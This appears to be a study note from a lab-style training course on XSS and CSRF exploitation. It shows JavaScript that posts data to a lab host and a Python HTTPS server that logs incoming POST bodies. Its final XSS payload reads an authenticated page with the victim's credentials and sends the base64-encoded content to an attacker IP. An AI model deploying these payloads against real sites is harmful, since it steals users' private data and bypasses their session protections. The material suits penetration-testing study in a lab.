In this section we will refresh the XSS and CSRF Exploitation Techniques.

Sending POST Request using XMLHTTPRequest

var xhr = new XMLHttpRequest();
xhr.open('POST', '<http://exfiltrate.htb/>', false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('param1=hello&param2=world');

image.png

Now let’s use the Fetch API

const response = await fetch('<http://exfiltrate.htb/>', {
    method: "POST",
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'param1=hello&param2=world',
  });

image.png

We can build a custom HTTPs python Server.

Let’s generate the certificate.

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

image.png

Now let’s go and create the server.

from http import server
import ssl

class CustomRequestHandler(server.SimpleHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Access-Control-Allow-Methods", "GET, POST, OPTIONS")
        self.send_header("Access-Control-Allow-Headers", "Content-Type")
        self.end_headers()

    def do_GET(self):
        super().do_GET()

    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length)

        if body:
            self.log_message("[i] POST body: %s", body.decode("utf-8", errors="replace"))

        self.send_response(200)
        self.end_headers()

print("Serving HTTPS on 0.0.0.0 port 4443 (<https://0.0.0.0:4443/>) ...")
httpd = server.HTTPServer(('0.0.0.0', 4443), CustomRequestHandler)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

image.png

var xhr = new XMLHttpRequest();
xhr.open('GET', '<https://filterbypass.htb/home.php>', true);
xhr.withCredentials = true;
xhr.onload = () => {
    var exfil = new XMLHttpRequest();
    exfil.open("POST", "<http://10.10.16.197/log>", true);
    exfil.setRequestHeader("Content-Type", "application/json");
    exfil.send(JSON.stringify({data: btoa(xhr.responseText)}));
    document.location = "<http://10.10.16.197/log?r=>" + btoa(xhr.responseText);
};
xhr.send();